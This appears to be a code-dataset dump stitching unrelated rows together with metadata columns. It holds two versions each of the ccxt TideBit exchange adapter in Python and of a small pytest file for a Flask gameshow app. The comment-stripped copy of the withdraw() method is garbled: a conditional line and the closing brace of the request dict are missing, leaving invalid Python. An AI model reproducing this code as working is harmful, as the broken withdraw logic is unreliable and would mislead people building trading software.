            'percentage': None,
            'previousClose': None,
            'average': None,
            'baseVolume': self.safe_float(ticker, 'vol'),
            'quoteVolume': None,
            'info': ticker,
        }
    def fetch_tickers(self, symbols=None, params={}):
        """Fetch tickers for all markets, keyed by unified symbol."""
        self.load_markets()
        tickers = self.publicGetTickers(params)
        ids = list(tickers.keys())
        result = {}
        for i in range(0, len(ids)):
            id = ids[i]
            market = None
            symbol = id
            if id in self.markets_by_id:
                market = self.markets_by_id[id]
                symbol = market['symbol']
            else:
                # unknown market id: assume 3-letter base + 3-letter quote
                # NOTE(review): this heuristic breaks for ids of other
                # lengths -- verify against the exchange's id scheme.
                baseId = id[0:3]
                quoteId = id[3:6]
                base = self.safe_currency_code(baseId)
                quote = self.safe_currency_code(quoteId)
                symbol = base + '/' + quote
            ticker = tickers[id]
            result[symbol] = self.parse_ticker(ticker, market)
        return result
    def fetch_ticker(self, symbol, params={}):
        """Fetch the ticker for a single market."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'market': market['id'],
        }
        response = self.publicGetTickersMarket(self.extend(request, params))
        return self.parse_ticker(response, market)
    def parse_trade(self, trade, market=None):
        """Convert an exchange trade payload into the unified ccxt trade."""
        timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
        id = self.safe_string(trade, 'id')
        price = self.safe_float(trade, 'price')
        amount = self.safe_float(trade, 'volume')
        cost = self.safe_float(trade, 'funds')
        symbol = None
        if market is not None:
            symbol = market['symbol']
        return {
            'id': id,
            'info': trade,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'type': None,
            'side': None,
            'order': None,
            'takerOrMaker': None,
            'price': price,
            'amount': amount,
            'cost': cost,
            'fee': None,
        }
    def fetch_trades(self, symbol, since=None, limit=None, params={}):
        """Fetch recent public trades for a market."""
        self.load_markets()
        market = self.market(symbol)
        request = {
            'market': market['id'],
        }
        response = self.publicGetTrades(self.extend(request, params))
        return self.parse_trades(response, market, since, limit)
    def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
        """Convert [t(s), o, h, l, c, v] to ccxt's [t(ms), o, h, l, c, v]."""
        return [
            ohlcv[0] * 1000,
            ohlcv[1],
            ohlcv[2],
            ohlcv[3],
            ohlcv[4],
            ohlcv[5],
        ]
    def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
        """Fetch OHLCV candles (GET k)."""
        self.load_markets()
        market = self.market(symbol)
        if limit is None:
            limit = 30  # default is 30
        request = {
            'market': market['id'],
            'period': self.timeframes[timeframe],
            'limit': limit,
        }
        if since is not None:
            request['timestamp'] = int(since / 1000)
        else:
            request['timestamp'] = 1800000
        response = self.publicGetK(self.extend(request, params))
        # the exchange returns the literal string 'null' when there is no data
        if response == 'null':
            return []
        return self.parse_ohlcvs(response, market, timeframe, since, limit)
    def parse_order_status(self, status):
        """Map exchange order states to unified ccxt statuses."""
        statuses = {
            'done': 'closed',
            'wait': 'open',
            'cancel': 'canceled',
        }
        return self.safe_string(statuses, status, status)
    def parse_order(self, order, market=None):
        """Convert an exchange order payload into the unified ccxt order."""
        symbol = None
        if market is not None:
            symbol = market['symbol']
        else:
            # NOTE(review): raw key access -- raises KeyError if 'market'
            # is absent or unknown; the safe_* helpers are not used here.
            marketId = order['market']
            symbol = self.markets_by_id[marketId]['symbol']
        timestamp = self.parse8601(self.safe_string(order, 'created_at'))
        status = self.parse_order_status(self.safe_string(order, 'state'))
        id = self.safe_string(order, 'id')
        type = self.safe_string(order, 'ord_type')
        side = self.safe_string(order, 'side')
        price = self.safe_float(order, 'price')
        amount = self.safe_float(order, 'volume')
        filled = self.safe_float(order, 'executed_volume')
        remaining = self.safe_float(order, 'remaining_volume')
        cost = None
        if price is not None:
            if filled is not None:
                cost = price * filled
        return {
            'id': id,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'lastTradeTimestamp': None,
            'status': status,
            'symbol': symbol,
            'type': type,
            'side': side,
            'price': price,
            'amount': amount,
            'filled': filled,
            'remaining': remaining,
            'cost': cost,
            'trades': None,
            'fee': None,
            'info': order,
        }
    def create_order(self, symbol, type, side, amount, price=None, params={}):
        """Place an order; price is only sent for limit orders."""
        self.load_markets()
        request = {
            'market': self.market_id(symbol),
            'side': side,
            'volume': str(amount),
            'ord_type': type,
        }
        if type == 'limit':
            request['price'] = str(price)
        response = self.privatePostOrders(self.extend(request, params))
        market = self.markets_by_id[response['market']]
        return self.parse_order(response, market)
    def cancel_order(self, id, symbol=None, params={}):
        """Cancel an order by id.

        Raises OrderNotFound if the order is already closed/canceled, so a
        successful return guarantees the cancel actually took effect.
        """
        self.load_markets()
        request = {
            'id': id,
        }
        result = self.privatePostOrderDelete(self.extend(request, params))
        order = self.parse_order(result)
        status = self.safe_string(order, 'status')
        if status == 'closed' or status == 'canceled':
            raise OrderNotFound(self.id + ' ' + self.json(order))
        return order
    def withdraw(self, code, amount, address, tag=None, params={}):
        """Request a withdrawal to a pre-bound account (params['id'] required)."""
        self.check_address(address)
        self.load_markets()
        currency = self.currency(code)
        id = self.safe_string(params, 'id')
        if id is None:
            raise ExchangeError(self.id + ' withdraw() requires an extra `id` param(withdraw account id according to withdraws/bind_account_list endpoint')
        request = {
            'id': id,
            'currency_type': 'coin',  # or 'cash'
            'currency': currency['id'],
            'body': amount,
            # 'address': address,  # they don't allow withdrawing to direct addresses?
        }
        if tag is not None:
            request['memo'] = tag
        result = self.privatePostWithdrawsApply(self.extend(request, params))
        return {
            'info': result,
            'id': None,
        }
    def nonce(self):
        """Millisecond timestamp used as the request nonce ('tonce')."""
        return self.milliseconds()
    def encode_params(self, params):
        """URL-encode params in sorted-key order (required for signing)."""
        return self.urlencode(self.keysort(params))
    def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
        """Build the signed request: HMAC over 'METHOD|path|sorted-query'."""
        request = '/' + 'api/' + self.version + '/' + self.implode_params(path, params) + '.json'
        query = self.omit(params, self.extract_params(path))
        url = self.urls['api'] + request
        if api == 'public':
            if query:
                url += '?' + self.urlencode(query)
        else:
            self.check_required_credentials()
            nonce = str(self.nonce())
            sortedByKey = self.keysort(self.extend({
                'access_key': self.apiKey,
                'tonce': nonce,
            }, params))
            query = self.urlencode(sortedByKey)
            payload = method + '|' + request + '|' + query
            signature = self.hmac(self.encode(payload), self.encode(self.secret))
            suffix = query + '&signature=' + signature
            if method == 'GET':
                url += '?' + suffix
            else:
                body = suffix
                headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        return {'url': url, 'method': method, 'body': body, 'headers': headers}
    def handle_errors(self, code, reason, url, method, headers, body, response):
        """Translate HTTP 400 error codes into typed ccxt exceptions."""
        if code == 400:
            error = self.safe_value(response, 'error')
            errorCode = self.safe_string(error, 'code')
            feedback = self.id + ' ' + self.json(response)
            exceptions = self.exceptions
            if errorCode in exceptions:
                raise exceptions[errorCode](feedback)
            # fallback to default error handler
| 36.632517 | 155 | 0.486685 |
ge import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import OrderNotFound
class tidebit (Exchange):
def describe(self):
return self.deep_extend(super(tidebit, self).describe(), {
'id': 'tidebit',
'name': 'TideBit',
'countries': ['HK'],
'rateLimit': 1000,
'version': 'v2',
'has': {
'fetchDepositAddress': True,
'CORS': True,
'fetchTickers': True,
'fetchOHLCV': True,
'withdraw': True,
},
'timeframes': {
'1m': '1',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'2h': '120',
'4h': '240',
'12h': '720',
'1d': '1440',
'3d': '4320',
'1w': '10080',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/39034921-e3acf016-4480-11e8-9945-a6086a1082fe.jpg',
'api': 'https://www.tidebit.com',
'www': 'https://www.tidebit.com',
'doc': [
'https://www.tidebit.com/documents/api/guide',
'https://www.tidebit.com/swagger/#/default',
],
'referral': 'http://bit.ly/2IX0LrM',
},
'api': {
'public': {
'get': [
'markets',
'tickers',
'tickers/{market}',
'timestamp',
'trades',
'trades/{market}',
'order_book',
'order',
'k_with_pending_trades',
'k',
'depth',
],
'post': [],
},
'private': {
'get': [
'addresses/{address}',
'deposits/history',
'deposits/get_deposit',
'deposits/deposit_address',
'historys/orders',
'historys/vouchers',
'historys/accounts',
'historys/snapshots',
'linkage/get_status',
'members/me',
'order',
'orders',
'partners/orders/{id}/trades',
'referral_commissions/get_undeposited',
'referral_commissions/get_graph_data',
'trades/my',
'withdraws/bind_account_list',
'withdraws/get_withdraw_account',
'withdraws/fetch_bind_info',
],
'post': [
'deposits/deposit_cash',
'favorite_markets/update',
'order/delete',
'orders',
'orders/multi',
'orders/clear',
'referral_commissions/deposit',
'withdraws/apply',
'withdraws/bind_bank',
'withdraws/bind_address',
],
},
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'maker': 0.2 / 100,
'taker': 0.2 / 100,
},
'funding': {
'tierBased': False,
'percentage': True,
'withdraw': {},
},
},
'exceptions': {
'2002': InsufficientFunds,
'2003': OrderNotFound,
},
})
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
if 'success' in response:
if response['success']:
address = self.safe_string(response, 'address')
tag = self.safe_string(response, 'addressTag')
return {
'currency': code,
'address': self.check_address(address),
'tag': tag,
'info': response,
}
def fetch_markets(self, params={}):
response = self.publicGetMarkets(params)
result = []
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'id')
symbol = self.safe_string(market, 'name')
baseId, quoteId = symbol.split('/')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetMembersMe(params)
balances = self.safe_value(response, 'accounts')
result = {'info': balances}
for i in range(0, len(balances)):
balance = balances[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_float(balance, 'balance')
account['used'] = self.safe_float(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
if limit is not None:
request['limit'] = limit
request['market'] = market['id']
response = self.publicGetDepth(self.extend(request, params))
timestamp = self.safe_timestamp(response, 'timestamp')
return self.parse_order_book(response, timestamp)
def parse_ticker(self, ticker, market=None):
timestamp = self.safe_timestamp(ticker, 'at')
ticker = self.safe_value(ticker, 'ticker', {})
symbol = None
if market is not None:
symbol = market['symbol']
last = self.safe_float(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': self.safe_float(ticker, 'buy'),
'ask': self.safe_float(ticker, 'sell'),
'bidVolume': None,
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'change': None,
'percentage': None,
'previousClose': None,
'average': None,
'baseVolume': self.safe_float(ticker, 'vol'),
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTickers(params)
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = None
symbol = id
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
else:
baseId = id[0:3]
quoteId = id[3:6]
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTickersMarket(self.extend(request, params))
return self.parse_ticker(response, market)
def parse_trade(self, trade, market=None):
timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
id = self.safe_string(trade, 'id')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'volume')
cost = self.safe_float(trade, 'funds')
symbol = None
if market is not None:
symbol = market['symbol']
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': None,
'side': None,
'order': None,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': None,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
}
response = self.publicGetTrades(self.extend(request, params))
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
return [
ohlcv[0] * 1000,
ohlcv[1],
ohlcv[2],
ohlcv[3],
ohlcv[4],
ohlcv[5],
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
if limit is None:
limit = 30
request = {
'market': market['id'],
'period': self.timeframes[timeframe],
'limit': limit,
}
if since is not None:
request['timestamp'] = int(since / 1000)
else:
request['timestamp'] = 1800000
response = self.publicGetK(self.extend(request, params))
if response == 'null':
return []
return self.parse_ohlcvs(response, market, timeframe, since, limit)
def parse_order_status(self, status):
statuses = {
'done': 'closed',
'wait': 'open',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
symbol = None
if market is not None:
symbol = market['symbol']
else:
marketId = order['market']
symbol = self.markets_by_id[marketId]['symbol']
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
status = self.parse_order_status(self.safe_string(order, 'state'))
id = self.safe_string(order, 'id')
type = self.safe_string(order, 'ord_type')
side = self.safe_string(order, 'side')
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'volume')
filled = self.safe_float(order, 'executed_volume')
remaining = self.safe_float(order, 'remaining_volume')
cost = None
if price is not None:
if filled is not None:
cost = price * filled
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'amount': amount,
'filled': filled,
'remaining': remaining,
'cost': cost,
'trades': None,
'fee': None,
'info': order,
}
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
request = {
'market': self.market_id(symbol),
'side': side,
'volume': str(amount),
'ord_type': type,
}
if type == 'limit':
request['price'] = str(price)
response = self.privatePostOrders(self.extend(request, params))
market = self.markets_by_id[response['market']]
return self.parse_order(response, market)
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'id': id,
}
result = self.privatePostOrderDelete(self.extend(request, params))
order = self.parse_order(result)
status = self.safe_string(order, 'status')
if status == 'closed' or status == 'canceled':
raise OrderNotFound(self.id + ' ' + self.json(order))
return order
def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
self.load_markets()
currency = self.currency(code)
id = self.safe_string(params, 'id')
if id is None:
raise ExchangeError(self.id + ' withdraw() requires an extra `id` param(withdraw account id according to withdraws/bind_account_list endpoint')
request = {
'id': id,
'currency_type': 'coin',
'currency': currency['id'],
'body': amount,
request['memo'] = tag
result = self.privatePostWithdrawsApply(self.extend(request, params))
return {
'info': result,
'id': None,
}
def nonce(self):
return self.milliseconds()
def encode_params(self, params):
return self.urlencode(self.keysort(params))
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
request = '/' + 'api/' + self.version + '/' + self.implode_params(path, params) + '.json'
query = self.omit(params, self.extract_params(path))
url = self.urls['api'] + request
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
nonce = str(self.nonce())
sortedByKey = self.keysort(self.extend({
'access_key': self.apiKey,
'tonce': nonce,
}, params))
query = self.urlencode(sortedByKey)
payload = method + '|' + request + '|' + query
signature = self.hmac(self.encode(payload), self.encode(self.secret))
suffix = query + '&signature=' + signature
if method == 'GET':
url += '?' + suffix
else:
body = suffix
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response):
if code == 400:
error = self.safe_value(response, 'error')
errorCode = self.safe_string(error, 'code')
feedback = self.id + ' ' + self.json(response)
exceptions = self.exceptions
if errorCode in exceptions:
raise exceptions[errorCode](feedback)
# fallback to default error handler
| true | true |
f7104af5717a6011d196d1dc4179149301442dfe | 803 | py | Python | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | tests/test_gameshow.py | AndrewWasHere/gameshow | 70441bff391f7313a1e186f68ee9df7df83c90fa | [
"BSD-3-Clause"
] | null | null | null | """
Copyright 2016, Andrew Lin
All rights reserved.
This software is licensed under the BSD 3-Clause License.
See LICENSE.txt at the root of the project or
https://opensource.org/licenses/BSD-3-Clause
"""
import pytest
from app.gameshow import make_gameshow
@pytest.fixture
def app():
    """Fixture: the gameshow app wrapped in a test client."""
    gameshow = make_gameshow()
    client = gameshow.test_client()
    return client
def test_scoreboard(app):
    """The scoreboard root endpoint serves an HTML page."""
    resp = app.get('/')
    assert resp.status_code == 200
    assert resp.content_type.startswith('text/html')
def test_proctor(app):
    """The /proctor endpoint serves an HTML page."""
    resp = app.get('/proctor')
    assert resp.status_code == 200
    assert resp.content_type.startswith('text/html')
def test_players(app):
"""Test /players endpoint.""" | 21.131579 | 57 | 0.697385 | import pytest
from app.gameshow import make_gameshow
@pytest.fixture
def app():
a = make_gameshow()
return a.test_client()
def test_scoreboard(app):
response = app.get('/')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_proctor(app):
response = app.get('/proctor')
assert response.status_code == 200
assert response.content_type.startswith('text/html')
def test_players(app): | true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.